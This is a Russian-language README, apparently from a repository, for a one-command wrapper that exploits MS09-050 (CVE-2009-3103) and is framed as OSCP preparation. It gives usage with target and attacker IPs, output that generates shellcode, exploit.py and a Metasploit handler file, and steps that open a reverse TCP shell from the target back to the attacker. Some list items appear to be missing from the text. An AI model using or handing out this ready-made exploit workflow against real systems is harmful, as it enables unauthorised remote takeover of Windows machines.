
Настройка одной командой для эксплуатации MS09-050 (CVE-2009-3103). Без хлопот, без отладки — просто работает.
Большинство встречающихся скриптов MS09-050 требуют ручной инъекции шелл-кода, имеют проблемы с таймингами обработчиков или просто не работают. Эта обёртка:
Создано для подготовки к OSCP, где время имеет значение.
msfvenommsfconsolepython2rpcclient (обычно предустановлен)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
Результат:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
Терминал 1 - Запустите обработчик:
msfconsole -q -r handler.rc
Дождитесь: Started reverse TCP handler on ...
Терминал 2 - Запустите эксплойт:
python2 exploit.py 192.168.233.40
Проверьте Терминал 1 на наличие шелла.
windows/shell/reverse_tcp) - надёжно работает со стейджером в этом эксплойтеОригинальный эксплойт основан на PoC MS09-050 от ohnozzy.
MIT — делайте что хотите, только не творите зла.